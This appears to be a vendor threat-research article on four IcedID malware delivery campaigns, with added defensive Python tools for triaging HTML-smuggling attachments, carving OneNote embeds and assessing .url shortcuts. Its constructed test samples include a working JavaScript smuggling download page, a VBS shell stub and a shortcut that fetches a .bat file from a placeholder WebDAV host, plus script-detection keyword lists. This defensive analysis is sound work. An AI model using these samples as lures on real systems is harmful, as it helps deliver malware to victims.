IcedID: Exploring Four Recent Malware Infection Techniques

In today’s evolving threat landscape, security teams must always be on their toes.

Effective protection is not simply a case of addressing a handful of vulnerabilities and countering half a dozen common attack methods. From DDoS, ransomware and SQL injection attacks to DNS spoofing, zero-day exploits and session hijacking, organizations need to be hyper-aware and capable of combating an ever-growing list of convincing and sophisticated techniques that attackers are developing. 

Today, any single piece of malware can be deployed in many ways.

In the case of IcedID, a modular banking trojan (also tracked as BokBot) first uncovered in 2017 and now one of the most notorious pieces of malware, threat actors can launch campaigns underpinned by a range of infection techniques.

This is precisely what the Menlo Labs team has seen in recent months, observing four overlapping campaigns. The IcedID attack chain is multi-stage: phishing emails, fake Zoom installers, malicious OneNote (.one) files and malvertising campaigns are all plausible first steps that ultimately direct victims to websites hosting payloads in the form of OneNote files, JavaScript files, Visual Basic Script (VBS) files and executables (EXEs).

In this latest column, we will dive deep into the four IcedID campaigns observed by Menlo Labs, considering their differences and ultimate goals.

1. HTML Smuggling Campaigns (October 2022)

In October 2022, we observed threat actors using HTML smuggling to deliver IcedID. The lure was an HTML email attachment that, when opened in the browser, reassembled a password-protected ZIP file on the endpoint and offered it as a download; the archive in turn carried a malicious ISO file. Because the payload travels encoded inside the HTML and only becomes a file once the browser decodes it, no archive or ISO ever crosses the mail gateway as an attachment.
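
The mechanism described above can be triaged without detonating the attachment. The following is an added example (not Menlo Labs code) that scans an HTML attachment for the two stages smuggling needs, the JavaScript that turns a string back into bytes and the API that hands those bytes to the browser as a download, and then decodes any long base64 literal to see whether it is an archive or executable. `SAMPLE_HTML` and `FAKE_ZIP` are constructed for the example; the flag bit checked on the ZIP header is the one a password-protected archive sets.

```python
"""Triage an HTML e-mail attachment for HTML smuggling.

Added example, not Menlo Labs code. The attachment carries the payload as
a base64 string and uses browser APIs to rebuild it as a download, so no
archive crosses the mail gateway as an attachment. We look for the decode
stage, the delivery stage and any long base64 literal that decodes to an
archive or executable. SAMPLE_HTML and FAKE_ZIP are constructed here.
"""
import base64
import re
import struct

# Browser APIs used to turn a string back into bytes (decode stage).
DECODE_APIS = [r"\batob\s*\(", r"\bUint8Array\b", r"\.charCodeAt\s*\(", r"String\.fromCharCode"]
# APIs used to hand the rebuilt bytes to the browser as a file (delivery stage).
DELIVERY_APIS = [r"new\s+Blob\s*\(", r"URL\.createObjectURL", r"msSaveOrOpenBlob",
                 r"msSaveBlob", r"\.download\s*="]
# Any quoted literal of at least 64 base64 characters.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")

MAGIC = [(b"PK\x03\x04", "zip"), (b"MZ", "pe"), (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),
         (b"Rar!\x1a\x07", "rar"), (b"7z\xbc\xaf\x27\x1c", "7z")]


def identify_payload(data):
    """Name the container type from its magic bytes, or None if unrecognised."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            # Bit 0 of the ZIP general-purpose flags marks an encrypted entry.
            if name == "zip" and len(data) >= 8 and struct.unpack_from("<H", data, 6)[0] & 1:
                return "zip-encrypted"
            return name
    # ISO 9660 keeps its "CD001" signature in the primary volume descriptor at 0x8001.
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso"
    return None


def decode_literals(html):
    """Decode every long base64 literal; return (literal_length, payload_type) pairs."""
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            blob = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
        found.append((len(m.group(1)), identify_payload(blob)))
    return found


def score_attachment(html):
    """Combine the three signals into a verdict plus the evidence behind it."""
    decode_hits = [p for p in DECODE_APIS if re.search(p, html)]
    delivery_hits = [p for p in DELIVERY_APIS if re.search(p, html)]
    literals = decode_literals(html)
    payload_types = [t for _, t in literals if t]
    if delivery_hits and (decode_hits or payload_types):
        verdict = "likely_html_smuggling"
    elif delivery_hits or decode_hits or literals:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "decode_apis": decode_hits, "delivery_apis": delivery_hits,
            "base64_literals": len(literals), "payload_types": payload_types}


# Constructed ZIP local-file header with the "encrypted" flag set, standing in
# for the password-protected archive that carried the ISO.
FAKE_ZIP = (b"PK\x03\x04" + b"\x14\x00" + b"\x01\x00" + bytes(18) + b"\x0b\x00" + b"\x00\x00"
            + b"invoice.iso" + bytes(64))

# Constructed smuggling page: decode in JavaScript, then force a download.
SAMPLE_HTML = (
    "<html><body><p>Your document is loading</p><script>\n"
    'var b64 = "' + base64.b64encode(FAKE_ZIP).decode() + '";\n'
    "var bin = atob(b64); var arr = new Uint8Array(bin.length);\n"
    "for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);\n"
    "var blob = new Blob([arr], {type: 'application/octet-stream'});\n"
    "var a = document.createElement('a'); a.href = URL.createObjectURL(blob);\n"
    "a.download = 'document.zip'; document.body.appendChild(a); a.click();\n"
    "</script></body></html>"
)
BENIGN_HTML = "<html><body><h1>Quarterly newsletter</h1><p>Nothing to see here.</p></body></html>"

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, score_attachment(page))
```

The regex signals alone are noisy (legitimate pages build Blobs too), which is why the verdict only reaches "likely" when a delivery API sits alongside either decode logic or a literal that decodes to a known container; a real deployment would also unwrap string concatenation and `replace()`-based obfuscation before the base64 pass.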

For context, some reports have claimed that IcedID is used exclusively by the Quantum ransomware gang (which previously operated as MountLocker, AstroLocker and XingLocker), a group formed by former Conti members.

2. Malvertising and SEO Poisoning Campaign (December 2022)

A couple of months later, the team encountered IcedID being delivered through a malvertising campaign that used Google pay-per-click ads to send victims to malicious domains hosting infection scripts.

This campaign also leveraged search engine optimization (SEO) poisoning, manipulating the content and code of compromised domains to raise their ranking on search engine results pages.

This is a form of Legacy URL Reputation Evasion (LURE): the malicious pages sit on domains that already carry an established, benign reputation, so URL categorization engines and users alike are inclined to trust them. That lets threat actors catch out unsuspecting victims while evading detection through a combination of technical and social engineering tactics.

3. OneNote and WebDAV Campaigns (December 2022 to February 2023)

In the same month, a further IcedID campaign was uncovered that abused Microsoft OneNote's ability to embed files in a page. Threat actors embedded scripts, EXEs, documents and other malicious files in OneNote pages before sharing the notebooks with potential targets. Opening the page and clicking the embedded object launches it, and because traditional detection engines such as anti-virus software tended to treat OneNote documents as safe, the malicious files were fetched and executed without raising alerts.
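
Those embedded objects are not hidden in any clever way; they sit inside the .one file in a documented structure, which makes them easy to carve out and classify before a user ever clicks one. The following is an added example (not Menlo Labs code) that walks every FileDataStoreObject in a .one file using the layout from Microsoft's MS-ONESTORE specification (16-byte header GUID, 8-byte little-endian length, 12 bytes of padding, the file bytes, then a 16-byte footer GUID) and reports what each embedded file looks like. The notebook bytes are constructed for the example; the GUIDs are the specification's.

```python
"""Carve embedded files out of a OneNote .one section file.

Added example, not Menlo Labs code. Layout taken from Microsoft's
MS-ONESTORE specification (FileDataStoreObject): 16-byte header GUID,
8-byte little-endian length, 4 unused + 8 reserved bytes, the file bytes,
then a 16-byte footer GUID. SAMPLE_ONE is constructed, not a real notebook.
"""
import struct
import uuid

# GUIDs from MS-ONESTORE; .one files store them little-endian, hence bytes_le.
ONE_FILE_MAGIC = uuid.UUID("7b5c52e4-d88c-4da7-aeb1-5378d02996d3").bytes_le  # Header.guidFileType
FDSO_HEADER = uuid.UUID("bde316e7-2665-4511-a4c4-8d4d0b7a9eac").bytes_le     # FileDataStoreObject.guidHeader
FDSO_FOOTER = uuid.UUID("71fba722-0f79-4a0b-bb13-899256426b24").bytes_le     # FileDataStoreObject.guidFooter
FDSO_HEADER_LEN = 36  # guidHeader(16) + cbLength(8) + unused(4) + reserved(8)

# Cheap text heuristics for the script types seen dropped via OneNote. Order matters.
SCRIPT_MARKERS = [(b"@echo off", "bat"), (b"CreateObject(", "vbs"), (b"ActiveXObject", "js"),
                  (b"WScript", "vbs/js"), (b"<script", "hta/html"), (b"powershell", "ps1")]


def classify(payload):
    """Rough type of an embedded file: what an analyst wants to know first."""
    if payload.startswith(b"MZ"):
        return "pe"
    if payload.startswith(b"PK\x03\x04"):
        return "zip"
    if payload.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole"
    if payload.startswith(b"%PDF"):
        return "pdf"
    if payload.startswith((b"\x89PNG", b"\xff\xd8\xff")):
        return "image"
    head = payload[:512].lower()
    for marker, kind in SCRIPT_MARKERS:
        if marker.lower() in head:
            return kind
    return "unknown"


def is_onenote(data):
    return data[:16] == ONE_FILE_MAGIC


def carve_embedded_files(data):
    """Walk every FileDataStoreObject and return one record per embedded file."""
    records = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        if pos + FDSO_HEADER_LEN > len(data):
            break  # header cut off at end of file
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        start = pos + FDSO_HEADER_LEN
        end = start + length
        truncated = end > len(data)  # corrupt or deliberately bogus length field
        payload = data[start:end]
        records.append({
            "offset": pos,
            "size": length,
            "type": classify(payload),
            "footer_ok": data[end:end + 16] == FDSO_FOOTER,
            "truncated": truncated,
            "data": payload,
        })
        # If the length lied, keep scanning from just after the header instead of skipping ahead.
        pos = data.find(FDSO_HEADER, start if truncated else end)
    return records


def suspicious_embeds(records):
    """Everything that is not an obviously inert attachment deserves a look."""
    return [r for r in records if r["type"] not in ("image", "pdf")]


def _fdso(payload):
    """Build one FileDataStoreObject around payload (used only to construct the sample)."""
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + bytes(12) + payload + FDSO_FOOTER


# Constructed notebook: a harmless image, a VBS dropper, and a PE, as the lures carried.
SAMPLE_ONE = (
    ONE_FILE_MAGIC + bytes(64)
    + _fdso(b"\x89PNG\r\n\x1a\n" + bytes(32))
    + bytes(16)
    + _fdso(b'Set sh = CreateObject("WScript.Shell")\r\nsh.Run "cmd /c echo constructed sample"\r\n')
    + _fdso(b"MZ\x90\x00" + bytes(96))
)

if __name__ == "__main__":
    for rec in carve_embedded_files(SAMPLE_ONE):
        print(rec["offset"], rec["size"], rec["type"], "footer_ok" if rec["footer_ok"] else "no footer")
```

Scanning for the header GUID rather than parsing the full object tree is deliberate: it finds embedded files even when the rest of the notebook is malformed, and the `footer_ok` and `truncated` flags tell the analyst when the declared length cannot be trusted.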

The team also found a second, similar campaign in February 2023, this time using .url (Internet Shortcut) files to retrieve a .bat file from an open-directory Web Distributed Authoring and Versioning (WebDAV) server. WebDAV is an extension of HTTP that lets clients read and write files on a remote web server, so the threat actors could fetch and execute the malware from the share and modify the hosted files at any time, swapping payloads without changing the lure.
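
A .url file is just an INI text file, and the URL= key is what Explorer opens on double-click, so the pattern in this campaign is visible in a few lines of text. The following is an added example (not Menlo Labs code) that parses a shortcut and flags a file:// URL reaching a remote host, the Windows WebDAV redirector syntax (host@80, host@SSL@443, a DavWWWRoot path) and a script or executable target. It also checks whether IconFile points at a remote path, a related .url abuse worth catching at the same time. The three shortcut texts are constructed; 203.0.113.0/24 is documentation address space.

```python
"""Assess a Windows Internet Shortcut (.url) file for remote-fetch abuse.

Added example, not Menlo Labs code. A file:// URL pointing at a remote host
makes Windows reach out over SMB, or over WebDAV when the host carries the
mini-redirector syntax (host@80, host@SSL@443) or the path contains
DavWWWRoot; a script target then runs locally. Sample shortcuts below are
constructed.
"""
import configparser
import re

RISKY_EXTENSIONS = {"bat", "cmd", "exe", "js", "jse", "vbs", "vbe", "wsf", "hta",
                    "lnk", "ps1", "scr", "msi", "dll", "iso", "one"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def parse_url_file(text):
    """Return the [InternetShortcut] keys lower-cased, tolerating odd casing and duplicates."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return {k.lower(): v.strip() for k, v in cp[section].items()}
    return {}


def split_file_url(url):
    """(host, path) for a file:// URL, accepting both slash styles and UNC-style prefixes."""
    rest = re.sub(r"^file:", "", url, flags=re.I).replace("\\", "/").lstrip("/")
    host, _, path = rest.partition("/")
    if re.fullmatch(r"[A-Za-z]:", host):  # file:///C:/... is a local drive, not a host
        return "", "/" + host + "/" + path
    return host, "/" + path


def assess(text):
    """Classify one .url file and list the indicators behind the verdict."""
    keys = parse_url_file(text)
    url = keys.get("url", "")
    result = {"url": url, "hostname": "", "remote": False, "webdav": False,
              "target_ext": "", "indicators": [], "verdict": "low"}
    if url.lower().startswith("file:"):
        host, path = split_file_url(url)
        parts = host.split("@")  # "203.0.113.10@80" or "host@SSL@443" is WebDAV redirector syntax
        hostname = parts[0].lower()
        filename = path.rsplit("/", 1)[-1]
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        result.update(hostname=hostname, target_ext=ext)
        if hostname not in LOCAL_HOSTS:
            result["remote"] = True
            result["indicators"].append("file:// URL reaches out to remote host " + hostname)
        if len(parts) > 1 or "davwwwroot" in path.lower():
            result["webdav"] = True
            result["indicators"].append("WebDAV redirector syntax (host@port or DavWWWRoot)")
        if ext in RISKY_EXTENSIONS:
            result["indicators"].append("target is a script/executable (." + ext + ")")
    icon = keys.get("iconfile", "")
    remote_icon = icon.startswith("\\\\") or icon.lower().startswith("file://")
    if remote_icon:
        result["indicators"].append("IconFile on a remote path; Explorer fetches it when rendering the icon")
    if result["remote"] and result["target_ext"] in RISKY_EXTENSIONS:
        result["verdict"] = "malicious_pattern"
    elif result["remote"] or result["webdav"] or remote_icon:
        result["verdict"] = "suspicious"
    return result


# Constructed samples: the campaign pattern, an ordinary web shortcut, a local file shortcut.
MALICIOUS_URL = (
    "[InternetShortcut]\r\n"
    "URL=file://203.0.113.10@80/DavWWWRoot/invoice.bat\r\n"
    "IconIndex=3\r\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
)
BENIGN_URL = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
LOCAL_URL = "[InternetShortcut]\r\nURL=file:///C:/Users/Public/readme.txt\r\n"

if __name__ == "__main__":
    for sample in (MALICIOUS_URL, BENIGN_URL, LOCAL_URL):
        print(assess(sample))
```

The same parser runs over .url files pulled from mail attachments, archive contents or an EDR's file-creation telemetry; a verdict of `malicious_pattern` (remote file:// host plus a script target) matches the lure exactly, while `suspicious` catches the neighbouring tricks that reuse the same plumbing.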

4. Thumbcache Viewer Campaign (March 2023)

In March 2023, a number of campaigns were observed that disguised the malware as 'Thumbcache Viewer', a genuine forensics utility. Here, users were shown a Windows User Account Control (UAC) prompt asking whether they wanted to allow the app, masquerading as Thumbcache Viewer, to make changes to their device.

Specifically, the program name in the prompt read: "Thumbcache Viewer is a forensics tool that helps to analyze the contents of thumbcache database files." If victims clicked Yes, the malware ran with the elevated privileges that UAC consent grants.

Threat Actors Can Use IcedID in Several Ways

It is not only the range of convincing and seamless techniques available to deploy IcedID that is dangerous. Once the malware is loaded onto a victim's system, it can wreak havoc in several ways.

IcedID is highly versatile. It can carry out a variety of malicious activities before security measures intervene, such as:

  • Modifying browser settings
  • Injecting malicious content into legitimate web pages
  • Harvesting stored browser credentials
  • Injecting code into existing processes to communicate with attacker-controlled command-and-control (C2) servers
  • Downloading additional payloads, such as those capable of invoking ransomware attacks
  • Stealing sensitive information, such as stored passwords
  • Taking screenshots of user activity
  • Recording keystrokes for potential password theft
  • Disabling security products, like anti-virus software or firewalls 

For organizations, visibility over such threats is vital. Firms must prioritize investing in suitable security solutions, ideally combining a secure access service edge (SASE) framework with the tools, policies and mindset required to strengthen a zero trust approach.

In doing so, they can ensure that all content is subject to inspection and enterprise security controls, building a security setup that is preventative and addresses the shortcomings of legacy security tools that are no longer fit for modern environments.
